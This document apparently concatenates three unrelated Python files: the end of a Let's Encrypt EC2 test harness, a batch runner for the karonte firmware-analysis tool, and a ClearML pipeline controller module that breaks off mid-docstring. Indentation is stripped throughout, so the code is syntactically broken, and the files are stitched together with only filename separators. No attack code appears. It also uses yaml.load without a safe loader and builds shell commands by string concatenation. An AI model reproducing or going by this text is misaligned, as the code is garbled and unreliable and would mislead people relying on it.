LOGDIR = "letest-%d"%int(time.time())
print("Making local dir for test repo and logs: %s"%LOGDIR)
local('mkdir %s'%LOGDIR)
# figure out what git object to test and locally create it in LOGDIR
print("Making local git repo")
try:
if cl_args.pull_request != '~':
print('Testing PR %s '%cl_args.pull_request,
"MERGING into master" if cl_args.merge_master else "")
execute(local_git_PR, cl_args.repo, cl_args.pull_request, cl_args.merge_master)
elif cl_args.branch != '~':
print('Testing branch %s of %s'%(cl_args.branch, cl_args.repo))
execute(local_git_branch, cl_args.repo, cl_args.branch)
else:
print('Testing master of %s'%cl_args.repo)
execute(local_git_clone, cl_args.repo)
except FabricException:
print("FAIL: trouble with git repo")
exit()
# Set up EC2 instances
#-------------------------------------------------------------------------------
configdata = yaml.load(open(cl_args.config_file, 'r'))
targetlist = configdata['targets']
print('Testing against these images: [%d total]'%len(targetlist))
for target in targetlist:
print(target['ami'], target['name'])
print("Connecting to EC2 using\n profile %s\n keyname %s\n keyfile %s"%(PROFILE, KEYNAME, KEYFILE))
AWS_SESSION = boto3.session.Session(profile_name=PROFILE)
EC2 = AWS_SESSION.resource('ec2')
print("Making Security Group")
sg_exists = False
for sg in EC2.security_groups.all():
if sg.group_name == 'letsencrypt_test':
sg_exists = True
print(" %s already exists"%'letsencrypt_test')
if not sg_exists:
make_security_group()
time.sleep(30)
print("Requesting Instances...")
boulder_server = make_instance('le-boulderserver',
BOULDER_AMI,
KEYNAME,
#machine_type='t2.micro',
machine_type='t2.medium',
security_groups=['letsencrypt_test'])
instances = []
for target in targetlist:
if target['virt'] == 'hvm':
machine_type = 't2.micro'
else:
machine_type = 't1.micro'
if 'userdata' in target.keys():
userdata = target['userdata']
else:
userdata = ''
instances.append(make_instance('le-%s'%target['name'],
target['ami'],
KEYNAME,
machine_type=machine_type,
userdata=userdata))
# Configure and launch boulder server
#-------------------------------------------------------------------------------
print("Waiting on Boulder Server")
boulder_server = block_until_instance_ready(boulder_server)
print(" server %s"%boulder_server)
print("Configuring and Launching Boulder")
# env.host_string defines the ssh user and host for connection
env.host_string = "ubuntu@%s"%boulder_server.public_ip_address
print("Boulder Server at (SSH):", env.host_string)
config_and_launch_boulder(boulder_server)
# blocking often unnecessary, but cheap EC2 VMs can get very slow
block_until_http_ready('http://%s:4000'%boulder_server.public_ip_address,
wait_time=10,
timeout=500)
boulder_url = "http://%s:4000/directory"%boulder_server.private_ip_address
print("Boulder Server at (public ip): http://%s:4000/directory"%boulder_server.public_ip_address)
print("Boulder Server at (EC2 private ip): %s"%boulder_url)
# Install and launch client scripts in parallel
#-------------------------------------------------------------------------------
print("Uploading and running test script in parallel: %s"%cl_args.test_script)
print("Output routed to log files in %s"%LOGDIR)
# (Advice: always use Manager.Queue, never regular multiprocessing.Queue
# the latter has implementation flaws that deadlock it in some circumstances)
manager = Manager()
outqueue = manager.Queue()
inqueue = manager.Queue()
SENTINEL = None #queue kill signal
# launch as many processes as clients to test
num_processes = len(targetlist)
jobs = [] #keep a reference to current procs
def test_client_process(inqueue, outqueue):
cur_proc = mp.current_process()
for inreq in iter(inqueue.get, SENTINEL):
ii, target = inreq
#save all stdout to log file
sys.stdout = open(LOGDIR+'/'+'%d_%s.log'%(ii,target['name']), 'w')
print("[%s : client %d %s %s]" % (cur_proc.name, ii, target['ami'], target['name']))
instances[ii] = block_until_instance_ready(instances[ii])
print("server %s at %s"%(instances[ii], instances[ii].public_ip_address))
env.host_string = "%s@%s"%(target['user'], instances[ii].public_ip_address)
print(env.host_string)
try:
install_and_launch_letsencrypt(instances[ii], boulder_url, target)
outqueue.put((ii, target, 'pass'))
print("%s - %s SUCCESS"%(target['ami'], target['name']))
except:
outqueue.put((ii, target, 'fail'))
print("%s - %s FAIL"%(target['ami'], target['name']))
pass
# append server letsencrypt.log to each per-machine output log
print("\n\nletsencrypt.log\n" + "-"*80 + "\n")
try:
execute(grab_letsencrypt_log)
except:
print("log fail\n")
pass
# initiate process execution
for i in range(num_processes):
p = mp.Process(target=test_client_process, args=(inqueue, outqueue))
jobs.append(p)
p.daemon = True # kills subprocesses if parent is killed
p.start()
# fill up work queue
for ii, target in enumerate(targetlist):
inqueue.put((ii, target))
# add SENTINELs to end client processes
for i in range(num_processes):
inqueue.put(SENTINEL)
# wait on termination of client processes
for p in jobs:
p.join()
# add SENTINEL to output queue
outqueue.put(SENTINEL)
# clean up
execute(local_repo_clean)
# print and save summary results
results_file = open(LOGDIR+'/results', 'w')
outputs = [outq for outq in iter(outqueue.get, SENTINEL)]
outputs.sort(key=lambda x: x[0])
for outq in outputs:
ii, target, status = outq
print('%d %s %s'%(ii, target['name'], status))
results_file.write('%d %s %s\n'%(ii, target['name'], status))
results_file.close()
if not cl_args.saveinstances:
print('Logs in ', LOGDIR)
print('Terminating EC2 Instances and Cleaning Dangling EBS Volumes')
boulder_server.terminate()
terminate_and_clean(instances)
else:
# print login information for the boxes for debugging
for ii, target in enumerate(targetlist):
print(target['name'],
target['ami'],
"%s@%s"%(target['user'], instances[ii].public_ip_address))
# kill any connections
fabric.network.disconnect_all()
|
run.py | # HELP:
# Run karonte on a set of firmware sample and store the results in ./eval/karonte_stats/results/<vendor>
import os
import sys
import subprocess as sp
from optparse import OptionParser
from optparse import Option, OptionValueError
import threading
import time
RESULTS = './eval/karonte_stats/results/'
class MultipleOption(Option):
ACTIONS = Option.ACTIONS + ("extend",)
STORE_ACTIONS = Option.STORE_ACTIONS + ("extend",)
TYPED_ACTIONS = Option.TYPED_ACTIONS + ("extend",)
ALWAYS_TYPED_ACTIONS = Option.ALWAYS_TYPED_ACTIONS + ("extend",)
def take_action(self, action, dest, opt, value, values, parser):
if action == "extend":
values.ensure_value(dest, []).append(value)
else:
Option.take_action(self, action, dest, opt, value, values, parser)
class KaronteStats:
def __init__(self):
self.N = 1
self.vendors = ['tenda', 'netgear', 'tp_link', 'd-link', 'lk', 'huawei', 'mediatek']
def parse_options(self):
parser = OptionParser(option_class=MultipleOption, description="Run karonte on a set of firmware sample and store the"
" results in ./eval/karonte_stats/results/<vendor>",
usage="%prog -n parallel_runs -v vendor",
version="%prog 1.0")
parser.add_option("-v", "--vendors",
action="extend", metavar='CATEGORIES',
help="tenda, netgear, tp-link, d-link, lk, huawei, mediatek")
parser.add_option("-n", "--n",
action="extend", metavar='CATEGORIES',
help="Number of parallel runs", )
(options, args) = parser.parse_args()
if options.n:
self.N = int(options.n[0])
self.vendors = options.vendors
if not self.N or self.N == 0:
self.N = 1
if not self.vendors:
self.vendors = ['tenda', 'netgear', 'tp_link', 'd-link', 'lk', 'huawei', 'mediatek']
self.vendors = [x.lower() for x in self.vendors]
def run_fw(self, config_file, log_path):
os.system('python tool/karonte.py ' + config_file + ' ' + log_path)
def run(self):
self.parse_options()
os.chdir('../../')
pool = [None] * self.N
i = self.N
free_pos = [x for x in xrange(self.N)]
if not os.path.exists(RESULTS):
os.makedirs(RESULTS)
for d in os.listdir('config'):
if d.lower() not in self.vendors:
continue
if not os.path.exists(RESULTS + '/' + d):
os.makedirs(RESULTS + '/' + d)
for f in os.listdir('config/' + d + '/'):
config_file = 'config/' + d + '/' + f
log_file = RESULTS + '/' + d + '/' + f
pos = free_pos[0]
free_pos = free_pos[1:]
pool[pos] = threading.Thread(target=self.run_fw, args=(config_file, log_file))
pool[pos].start()
i -= 1
while i == 0:
alive = [x.is_alive() for x in pool]
free_pos += [x for x, y in enumerate(alive) if not y]
i += len([x for x in alive if not x])
time.sleep(1)
# wait for them to finish
print "Waiting... "
[x.join() for x in pool if x]
if __name__ == '__main__':
KaronteStats().run()
|
controller.py | import atexit
import functools
import inspect
import json
import os
import re
from copy import copy, deepcopy
from datetime import datetime
from logging import getLogger
from multiprocessing import Process, Queue
from threading import Thread, Event, RLock
from time import time
from typing import Sequence, Optional, Mapping, Callable, Any, List, Dict, Union, Tuple
from attr import attrib, attrs
from pathlib2 import Path
from .job import LocalClearmlJob, RunningJob
from .. import Logger
from ..automation import ClearmlJob
from ..backend_interface.task.populate import CreateFromFunction
from ..backend_interface.util import get_or_create_project, exact_match_regex
from ..debugging.log import LoggerRoot
from ..model import BaseModel, OutputModel
from ..task import Task
from ..utilities.proxy_object import LazyEvalWrapper, flatten_dictionary
class PipelineController(object):
"""
Pipeline controller.
Pipeline is a DAG of base tasks, each task will be cloned (arguments changed as required), executed, and monitored.
The pipeline process (task) itself can be executed manually or by the clearml-agent services queue.
Notice: The pipeline controller lives as long as the pipeline itself is being executed.
"""
_tag = 'pipeline'
_node_tag_prefix = 'pipe:'
_step_pattern = r"\${[^}]*}"
_config_section = 'Pipeline'
_args_section = 'Args'
_pipeline_step_ref = 'pipeline'
_runtime_property_hash = '_pipeline_hash'
_reserved_pipeline_names = (_pipeline_step_ref, )
_task_project_lookup = {}
_clearml_job_class = ClearmlJob
_update_execution_plot_interval = 5.*60
_monitor_node_interval = 5.*60
_report_plot_execution_flow = dict(title='Pipeline', series='Execution Flow')
_report_plot_execution_details = dict(title='Pipeline Details', series='Execution Details')
@attrs
class Node(object):
name = attrib(type=str) # pipeline step name
base_task_id = attrib(type=str, default=None) # base Task ID to be cloned and launched
task_factory_func = attrib(type=Callable, default=None) # alternative to base_task_id, function creating a Task
queue = attrib(type=str, default=None) # execution queue name to use
parents = attrib(type=list, default=[]) # list of parent DAG steps
timeout = attrib(type=float, default=None) # execution timeout limit
parameters = attrib(type=dict, default={}) # Task hyper parameters to change
configurations = attrib(type=dict, default={}) # Task configuration objects to change
task_overrides = attrib(type=dict, default={}) # Task overrides to change
executed = attrib(type=str, default=None) # The actual executed Task ID (None if not executed yet)
clone_task = attrib(type=bool, default=True) # If True cline the base_task_id, then execute the cloned Task
job = attrib(type=ClearmlJob, default=None) # ClearMLJob object
skip_job = attrib(type=bool, default=False) # if True, this step should be skipped
continue_on_fail = attrib(type=bool, default=False) # if True, the pipeline continues even if the step failed
cache_executed_step = attrib(type=bool, default=False) # if True this pipeline step should be cached
return_artifacts = attrib(type=list, default=[]) # List of artifact names returned by the step
monitor_metrics = attrib(type=list, default=[]) # List of metric title/series to monitor
monitor_artifacts = attrib(type=list, default=[]) # List of artifact names to monitor
monitor_models = attrib(type=list, default=[]) # List of models to monitor
def copy(self):
# type: () -> PipelineController.Node
"""
return a copy of the current Node, excluding the `job`, `executed`, fields
:return: new Node copy
"""
new_copy = PipelineController.Node(
name=self.name,
**dict((k, deepcopy(v)) for k, v in self.__dict__.items()
if k not in ('name', 'job', 'executed', 'task_factory_func'))
)
new_copy.task_factory_func = self.task_factory_func
return new_copy
def __init__(
self,
name, # type: str
project, # type: str
version, # type: str
pool_frequency=0.2, # type: float
add_pipeline_tags=False, # type: bool
target_project=None, # type: Optional[str]
auto_version_bump=True, # type: bool
abort_on_failure=False, # type: bool
):
# type: (...) -> None
"""
Create a new pipeline controller. The newly created object will launch and monitor the new experiments.
:param name: Provide pipeline name (if main Task exists it overrides its name)
:param project: Provide project storing the pipeline (if main Task exists it overrides its project)
:param version: Must provide pipeline version. This version allows to uniquely identify the pipeline
template execution. Examples for semantic versions: version='1.0.1' , version='23', version='1.2'
:param float pool_frequency: The pooling frequency (in minutes) for monitoring experiments / states.
:param bool add_pipeline_tags: (default: False) if True, add `pipe: <pipeline_task_id>` tag to all
steps (Tasks) created by this pipeline.
:param str target_project: If provided, all pipeline steps are cloned into the target project
:param bool auto_version_bump: If True (default), if the same pipeline version already exists
(with any difference from the current one), the current pipeline version will be bumped to a new version
version bump examples: 1.0.0 -> 1.0.1 , 1.2 -> 1.3, 10 -> 11 etc.
:param bool abort_on_failure: If False (default), failed pipeline steps will not cause the pipeline
to stop immediately, instead any step that is not connected (or indirectly connected) to the failed step,
will still be executed. Nonetheless the pipeline itself will be marked failed, unless the failed step
was specifically defined with "continue_on_fail=True".
If True, any failed step will cause the pipeline to immediately abort, stop all running steps,
and mark the pipeline as failed.
"""
self._nodes = {}
self._running_nodes = []
self._start_time = None
self._pipeline_time_limit = None
self._default_execution_queue = None
self._version = str(version).strip()
if not self._version or not all(i and i.isnumeric() for i in self._version.split('.')):
raise ValueError(
"Pipeline version has to be in a semantic version form, "
"examples: version='1.0.1', version='1.2', version='23'")
self._pool_frequency = pool_frequency * 60.
self._thread = None
self._pipeline_args = dict()
self._pipeline_args_desc = dict()
self._stop_event = None
self._experiment_created_cb = None
self._experiment_completed_cb = None
self._pre_step_callbacks = {}
self._post_step_callbacks = {}
self._target_project = target_project or ''
self._add_pipeline_tags = add_pipeline_tags
self._task = Task.current_task()
self._step_ref_pattern = re.compile(self._step_pattern)
self._reporting_lock = RLock()
self._pipeline_task_status_failed = None
self._auto_version_bump = bool(auto_version_bump)
self._mock_execution = False # used for nested pipelines (eager execution)
if not self._task:
self._task = Task.init(
project_name=project or 'Pipelines',
task_name=name or 'Pipeline {}'.format(datetime.now()),
task_type=Task.TaskTypes.controller,
auto_resource_monitoring=False,
reuse_last_task_id=False
)
self._task.set_system_tags((self._task.get_system_tags() or []) + [self._tag])
self._task.set_user_properties(version=self._version)
self._auto_connect_task = bool(self._task)
# make sure we add to the main Task the pipeline tag
if self._task:
self._task.add_tags([self._tag])
self._monitored_nodes = {} # type: Dict[str, dict]
self._abort_running_steps_on_failure = abort_on_failure
def set_default_execution_queue(self, default_execution_queue):
# type: (Optional[str]) -> None
"""
Set the default execution queue if pipeline step does not specify an execution queue
:param default_execution_queue: The execution queue to use if no execution queue is provided
"""
self._default_execution_queue = str(default_execution_queue) if default_execution_queue else None
def set_pipeline_execution_time_limit(self, max_execution_minutes):
# type: (Optional[float]) -> None
"""
Set maximum execution time (minutes) for the entire pipeline. Pass None or 0 to disable execution time limit.
:param float max_execution_minutes: The maximum time (minutes) for the entire pipeline process. The
default is ``None``, indicating no time limit.
"""
self._pipeline_time_limit = max_execution_minutes * 60. if max_execution_minutes else None
def add_step(
self,
name, # type: str
base_task_id=None, # type: Optional[str]
parents=None, # type: Optional[Sequence[str]]
parameter_override=None, # type: Optional[Mapping[str, Any]]
configuration_overrides=None, # type: Optional[Mapping[str, Union[str, Mapping]]]
task_overrides=None, # type: Optional[Mapping[str, Any]]
execution_queue=None, # type: Optional[str]
monitor_metrics=None, # type: Optional[List[Union[Tuple[str, str], Tuple[(str, str), (str, str)]]]]
monitor_artifacts=None, # type: Optional[List[Union[str, Tuple[str, str]]]]
monitor_models=None, # type: Optional[List[Union[str, Tuple[str, str]]]]
time_limit=None, # type: Optional[float]
base_task_project=None, # type: Optional[str]
base_task_name=None, # type: Optional[str]
clone_base_task=True, # type: bool
continue_on_fail=False, # type: bool
pre_execute_callback=None, # type: Optional[Callable[[PipelineController, PipelineController.Node, dict], bool]] # noqa
post_execute_callback=None, # type: Optional[Callable[[PipelineController, PipelineController.Node], None]] # noqa
cache_executed_step=False, # type: bool
base_task_factory=None, # type: Optional[Callable[[PipelineController.Node], Task]]
):
# type: (...) -> bool
"""
Add a step to the pipeline execution DAG.
Each step must have a unique name (this name will later be used to address the step)
:param name: Unique of the step. For example `stage1`
:param base_task_id: The Task ID to use for the step. Each time the step is executed,
the base Task is cloned, then the cloned task will be sent for execution.
:param parents: Optional list of parent nodes in the DAG.
The current step in the pipeline will be sent for execution only after all the parent nodes
have been executed successfully.
:param parameter_override: Optional parameter overriding dictionary.
The dict values can reference a previously executed step using the following form '${step_name}'
Examples:
- Artifact access
parameter_override={'Args/input_file': '${<step_name>.artifacts.<artifact_name>.url}' }
- Model access (last model used)
parameter_override={'Args/input_file': '${<step_name>.models.output.-1.url}' }
- Parameter access
parameter_override={'Args/input_file': '${<step_name>.parameters.Args/input_file}' }
- Pipeline Task argument (see `Pipeline.add_parameter`)
parameter_override={'Args/input_file': '${pipeline.<pipeline_parameter>}' }
- Task ID
parameter_override={'Args/input_file': '${stage3.id}' }
:param configuration_overrides: Optional, override Task configuration objects.
Expected dictionary of configuration object name and configuration object content.
Examples:
{'General': dict(key='value')}
{'General': 'configuration file content'}
{'OmegaConf': YAML.dumps(full_hydra_dict)}
:param task_overrides: Optional task section overriding dictionary.
The dict values can reference a previously executed step using the following form '${step_name}'
Examples:
- get the latest commit from a specific branch
task_overrides={'script.version_num': '', 'script.branch': 'main'}
- match git repository branch to a previous step
task_overrides={'script.branch': '${stage1.script.branch}', 'script.version_num': ''}
- change container image
task_overrides={'container.image': '${stage1.container.image}'}
- match container image to a previous step
task_overrides={'container.image': '${stage1.container.image}'}
:param execution_queue: Optional, the queue to use for executing this specific step.
If not provided, the task will be sent to the default execution queue, as defined on the class
:param monitor_metrics: Optional, log the step's metrics on the pipeline Task.
Format is a list of pairs metric (title, series) to log:
[(step_metric_title, step_metric_series), ]
Example: [('test', 'accuracy'), ]
Or a list of tuple pairs, to specify a different target metric for to use on the pipeline Task:
[((step_metric_title, step_metric_series), (target_metric_title, target_metric_series)), ]
Example: [[('test', 'accuracy'), ('model', 'accuracy')], ]
:param monitor_artifacts: Optional, log the step's artifacts on the pipeline Task.
Provided a list of artifact names existing on the step's Task, they will also appear on the Pipeline itself.
Example: [('processed_data', 'final_processed_data'), ]
Alternatively user can also provide a list of artifacts to monitor
(target artifact name will be the same as original artifact name)
Example: ['processed_data', ]
:param monitor_models: Optional, log the step's output models on the pipeline Task.
Provided a list of model names existing on the step's Task, they will also appear on the Pipeline itself.
Example: [('model_weights', 'final_model_weights'), ]
Alternatively user can also provide a list of models to monitor
(target models name will be the same as original model)
Example: ['model_weights', ]
To select the latest (lexicographic) model use "model_*", or the last created model with just "*"
Example: ['model_weights_*', ]
:param time_limit: Default None, no time limit.
Step execution time limit, if exceeded the Task is aborted and the pipeline is stopped and marked failed.
:param base_task_project: If base_task_id is not given,
use the base_task_project and base_task_name combination to retrieve the base_task_id to use for the step.
:param base_task_name: If base_task_id is not given,
use the base_task_project and base_task_name combination to retrieve the base_task_id to use for the step.
:param clone_base_task: If True (default) the pipeline will clone the base task, and modify/enqueue
the cloned Task. If False, the base-task is used directly, notice it has to be in draft-mode (created).
:param continue_on_fail: (default False). If True, failed step will not cause the pipeline to stop
(or marked as failed). Notice, that steps that are connected (or indirectly connected)
to the failed step will be skipped.
:param pre_execute_callback: Callback function, called when the step (Task) is created
and before it is sent for execution. Allows a user to modify the Task before launch.
Use `node.job` to access the ClearmlJob object, or `node.job.task` to directly access the Task object.
`parameters` are the configuration arguments passed to the ClearmlJob.
If the callback returned value is `False`,
the Node is skipped and so is any node in the DAG that relies on this node.
Notice the `parameters` are already parsed,
e.g. `${step1.parameters.Args/param}` is replaced with relevant value.
.. code-block:: py
def step_created_callback(
pipeline, # type: PipelineController,
node, # type: PipelineController.Node,
parameters, # type: dict
):
pass
:param post_execute_callback: Callback function, called when a step (Task) is completed
and it other jobs are executed. Allows a user to modify the Task status after completion.
.. code-block:: py
def step_completed_callback(
pipeline, # type: PipelineController,
node, # type: PipelineController.Node,
):
pass
:param cache_executed_step: If True, before launching the new step,
after updating with the latest configuration, check if an exact Task with the same parameter/code
was already executed. If it was found, use it instead of launching a new Task.
Default: False, a new cloned copy of base_task is always used.
Notice: If the git repo reference does not have a specific commit ID, the Task will never be used.
If `clone_base_task` is False there is no cloning, hence the base_task is used.
:param base_task_factory: Optional, instead of providing a pre-existing Task,
provide a Callable function to create the Task (returns Task object)
:return: True if successful
"""
# always store callback functions (even when running remotely)
if pre_execute_callback:
self._pre_step_callbacks[name] = pre_execute_callback
if post_execute_callback:
self._post_step_callbacks[name] = post_execute_callback
# when running remotely do nothing, we will deserialize ourselves when we start
# if we are not cloning a Task, we assume this step is created from code, not from the configuration
if not base_task_factory and clone_base_task and self._has_stored_configuration():
return True
self._verify_node_name(name)
if not base_task_factory and not base_task_id:
if not base_task_project or not base_task_name:
raise ValueError('Either base_task_id or base_task_project/base_task_name must be provided')
base_task = Task.get_task(
project_name=base_task_project,
task_name=base_task_name,
allow_archived=True,
task_filter=dict(
status=[str(Task.TaskStatusEnum.created), str(Task.TaskStatusEnum.queued),
str(Task.TaskStatusEnum.in_progress), str(Task.TaskStatusEnum.published),
str(Task.TaskStatusEnum.stopped), str(Task.TaskStatusEnum.completed),
str(Task.TaskStatusEnum.closed)],
)
)
if not base_task:
raise ValueError('Could not find base_task_project={} base_task_name={}'.format(
base_task_project, base_task_name))
if Task.archived_tag in base_task.get_system_tags():
LoggerRoot.get_base_logger().warning(
'Found base_task_project={} base_task_name={} but it is archived'.format(
base_task_project, base_task_name))
base_task_id = base_task.id
if configuration_overrides is not None:
# verify we have a dict or a string on all values
if not isinstance(configuration_overrides, dict) or \
not all(isinstance(v, (str, dict)) for v in configuration_overrides.values()):
raise ValueError("configuration_overrides must be a dictionary, with all values "
"either dicts or strings, got \'{}\' instead".format(configuration_overrides))
if task_overrides:
task_overrides = flatten_dictionary(task_overrides, sep='.')
self._nodes[name] = self.Node(
name=name, base_task_id=base_task_id, parents=parents or [],
queue=execution_queue, timeout=time_limit,
parameters=parameter_override or {},
configurations=configuration_overrides,
clone_task=clone_base_task,
task_overrides=task_overrides,
cache_executed_step=cache_executed_step,
continue_on_fail=continue_on_fail,
task_factory_func=base_task_factory,
monitor_metrics=monitor_metrics or [],
monitor_artifacts=monitor_artifacts or [],
monitor_models=monitor_models or [],
)
if self._task and not self._task.running_locally():
self.update_execution_plot()
return True
def add_function_step(
self,
name, # type: str
function, # type: Callable
function_kwargs=None, # type: Optional[Dict[str, Any]]
function_return=None, # type: Optional[List[str]]
project_name=None, # type: Optional[str]
task_name=None, # type: Optional[str]
task_type=None, # type: Optional[str]
packages=None, # type: Optional[Union[str, Sequence[str]]]
repo=None, # type: Optional[str]
repo_branch=None, # type: Optional[str]
repo_commit=None, # type: Optional[str]
helper_functions=None, # type: Optional[Sequence[Callable]]
docker=None, # type: Optional[str]
docker_args=None, # type: Optional[str]
docker_bash_setup_script=None, # type: Optional[str]
parents=None, # type: Optional[Sequence[str]],
execution_queue=None, # type: Optional[str]
monitor_metrics=None, # type: Optional[List[Union[Tuple[str, str], Tuple[(str, str), (str, str)]]]]
monitor_artifacts=None, # type: Optional[List[Union[str, Tuple[str, str]]]]
monitor_models=None, # type: Optional[List[Union[str, Tuple[str, str]]]]
time_limit=None, # type: Optional[float]
continue_on_fail=False, # type: bool
pre_execute_callback=None, # type: Optional[Callable[[PipelineController, PipelineController.Node, dict], bool]] # noqa
post_execute_callback=None, # type: Optional[Callable[[PipelineController, PipelineController.Node], None]] # noqa
cache_executed_step=False, # type: bool
):
# type: (...) -> bool
"""
Create a Task from a function, including wrapping the function input arguments
into the hyper-parameter section as kwargs, and storing function results as named artifacts
Example:
def mock_func(a=6, b=9):
c = a*b
print(a, b, c)
return c, c**2
create_task_from_function(mock_func, function_return=['mul', 'square'])
Example arguments from other Tasks (artifact):
def mock_func(matrix_np):
c = matrix_np*matrix_np
print(matrix_np, c)
return c
create_task_from_function(
mock_func,
function_input_artifacts={'matrix_np': 'aabb1122.previous_matrix'},
function_return=['square_matrix']
)
:param name: Unique of the step. For example `stage1`
:param function: A global function to convert into a standalone Task
:param function_kwargs: Optional, provide subset of function arguments and default values to expose.
If not provided automatically take all function arguments & defaults
Optional, pass input arguments to the function from other Tasks's output artifact.
Example argument named `numpy_matrix` from Task ID `aabbcc` artifact name `answer`:
{'numpy_matrix': 'aabbcc.answer'}
:param function_return: Provide a list of names for all the results.
If not provided no results will be stored as artifacts.
:param project_name: Set the project name for the task. Required if base_task_id is None.
:param task_name: Set the name of the remote task. Required if base_task_id is None.
:param task_type: Optional, The task type to be created. Supported values: 'training', 'testing', 'inference',
'data_processing', 'application', 'monitor', 'controller', 'optimizer', 'service', 'qc', 'custom'
:param packages: Manually specify a list of required packages or a local requirements.txt file.
Example: ["tqdm>=2.1", "scikit-learn"] or "./requirements.txt"
If not provided, packages are automatically added based on the imports used in the function.
:param repo: Optional, specify a repository to attach to the function, when remotely executing.
Allow users to execute the function inside the specified repository, enabling to load modules/script
from a repository Notice the execution work directory will be the repository root folder.
Supports both git repo url link, and local repository path.
Example remote url: 'https://github.com/user/repo.git'
Example local repo copy: './repo' -> will automatically store the remote
repo url and commit ID based on the locally cloned copy
:param repo_branch: Optional, specify the remote repository branch (Ignored, if local repo path is used)
:param repo_commit: Optional, specify the repository commit id (Ignored, if local repo path is used)
:param helper_functions: Optional, a list of helper functions to make available
for the standalone function Task.
:param docker: Select the docker image to be executed in by the remote session
:param docker_args: Add docker arguments, pass a single string
:param docker_bash_setup_script: Add bash script to be executed
inside the docker before setting up the Task's environment
:param parents: Optional list of parent nodes in the DAG.
The current step in the pipeline will be sent for execution only after all the parent nodes
have been executed successfully.
:param execution_queue: Optional, the queue to use for executing this specific step.
If not provided, the task will be sent to the default execution queue, as defined on the class
:param monitor_metrics: Optional, log the step's metrics on the pipeline Task.
Format is a list of pairs metric (title, series) to log:
[(step_metric_title, step_metric_series), ]
Example: [('test', 'accuracy'), ]
Or a list of tuple pairs, to specify a different target metric for to use on the pipeline Task:
[((step_metric_title, step_metric_series), (target_metric_title, target_metric_series)), ]
Example: [[('test', 'accuracy'), ('model', 'accuracy')], ]
:param monitor_artifacts: Optional, log the step's artifacts on the pipeline Task.
Provided a list of artifact names existing on the step's Task, they will also appear on the Pipeline itself.
Example: [('processed_data', 'final_processed_data'), ]
Alternatively user can also provide a list of artifacts to monitor
(target artifact name will be the same as original artifact name)
Example: ['processed_data', ]
:param monitor_models: Optional, log the step's output models on the pipeline Task.
Provided a list of model names existing on the step's Task, they will also appear on the Pipeline itself.
Example: [('model_weights', 'final_model_weights'), ]
Alternatively user can also provide a list of models to monitor
(target models name will be the same as original model)
Example: ['model_weights', ]
To select the latest (lexicographic) model use "model_*", or the last created model with just "*"
Example: ['model_weights_*', ]
:param time_limit: Default None, no time limit.
Step execution time limit, if exceeded the Task is aborted and the pipeline is stopped and marked failed.
:param continue_on_fail: (default False). If True, failed step will not cause the pipeline to stop
(or marked as failed). Notice, that steps that are connected (or indirectly connected)
to the failed step will be skipped.
:param pre_execute_callback: Callback function, called when the step (Task) is created
and before it is sent for execution. Allows a user to modify the Task before launch.
Use `node.job` to access the ClearmlJob object, or `node.job.task` to directly access the Task object.
`parameters` are the configuration arguments passed to the ClearmlJob.
If the callback returned value is `False`,
the Node is skipped and so is any node in the DAG that relies on this node.
Notice the `parameters` are already parsed,
e.g. `${step1.parameters.Args/param}` is replaced with relevant value.
.. code-block:: py
def step_created_callback(
pipeline, # type: PipelineController,
node, # type: PipelineController.Node,
parameters, # type: dict
):
pass
:param post_execute_callback: Callback function, called when a step (Task) is completed
and it other jobs are executed. Allows a user to modify the Task status after completion.
.. code-block:: py
def step_completed_callback(
pipeline, # type: PipelineController,
node, # type: PipelineController.Node,
):
pass
:param cache_executed_step: If True, before launching the new step,
after updating with the latest configuration, check if an exact Task with the same parameter/code
was already executed. If it was found, use it instead of launching a new Task.
Default: False, a new cloned copy of base_task is always used.
Notice: If the git repo reference does not have a specific commit ID, the Task will never be used.
:return: True if successful
"""
# always store callback functions (even when running remotely)
if pre_execute_callback:
self._pre_step_callbacks[name] = pre_execute_callback
if post_execute_callback:
self._post_step_callbacks[name] = post_execute_callback
self._verify_node_name(name)
function_kwargs = function_kwargs or {}
function_input_artifacts = {}
# go over function_kwargs, split it into string and input artifacts
for k, v in function_kwargs.items():
if v and self._step_ref_pattern.match(str(v)):
# check for step artifacts
step, _, artifact = v[2:-1].partition('.')
if step in self._nodes and artifact in self._nodes[step].return_artifacts:
function_input_artifacts[k] = "${{{}.id}}.{}".format(step, artifact)
continue
# verify the reference
self.__verify_step_reference(node=self.Node(name=name), step_ref_string=v)
function_kwargs = {k: v for k, v in function_kwargs.items() if k not in function_input_artifacts}
parameters = {"{}/{}".format(CreateFromFunction.kwargs_section, k): v for k, v in function_kwargs.items()}
if function_input_artifacts:
parameters.update(
{"{}/{}".format(CreateFromFunction.input_artifact_section, k): str(v)
for k, v in function_input_artifacts.items()}
)
if self._mock_execution:
project_name = project_name or self._target_project or self._task.get_project_name()
task_definition = self._create_task_from_function(
docker, docker_args, docker_bash_setup_script, function,
function_input_artifacts, function_kwargs,
function_return, packages, project_name, task_name,
task_type, repo, repo_branch, repo_commit, helper_functions)
elif self._task.running_locally():
project_name = project_name or self._target_project or self._task.get_project_name()
task_definition = self._create_task_from_function(
docker, docker_args, docker_bash_setup_script, function,
function_input_artifacts, function_kwargs,
function_return, packages, project_name, task_name,
task_type, repo, repo_branch, repo_commit, helper_functions)
# update configuration with the task definitions
# noinspection PyProtectedMember
self._task._set_configuration(
name=name, config_type='json',
config_text=json.dumps(task_definition, indent=1)
)
else:
# load task definition from configuration
# noinspection PyProtectedMember
task_definition = json.loads(self._task._get_configuration_text(name=name))
def _create_task(_):
a_task = Task.create(
project_name=project_name,
task_name=task_definition.get('name'),
task_type=task_definition.get('type'),
)
# replace reference
a_task.update_task(task_definition)
return a_task
self._nodes[name] = self.Node(
name=name, base_task_id=None, parents=parents or [],
queue=execution_queue, timeout=time_limit,
parameters=parameters,
clone_task=False,
cache_executed_step=cache_executed_step,
task_factory_func=_create_task,
continue_on_fail=continue_on_fail,
return_artifacts=function_return,
monitor_artifacts=monitor_artifacts,
monitor_metrics=monitor_metrics,
monitor_models=monitor_models,
)
if self._task and not self._task.running_locally() and not self._mock_execution:
self.update_execution_plot()
return True
def start(
self,
queue='services',
step_task_created_callback=None, # type: Optional[Callable[[PipelineController, PipelineController.Node, dict], bool]] # noqa
step_task_completed_callback=None, # type: Optional[Callable[[PipelineController, PipelineController.Node], None]] # noqa
wait=True,
):
# type: (...) -> bool
"""
Start the current pipeline remotely (on the selected services queue).
The current process will be stopped and launched remotely.
:param queue: queue name to launch the pipeline on
:param Callable step_task_created_callback: Callback function, called when a step (Task) is created
and before it is sent for execution. Allows a user to modify the Task before launch.
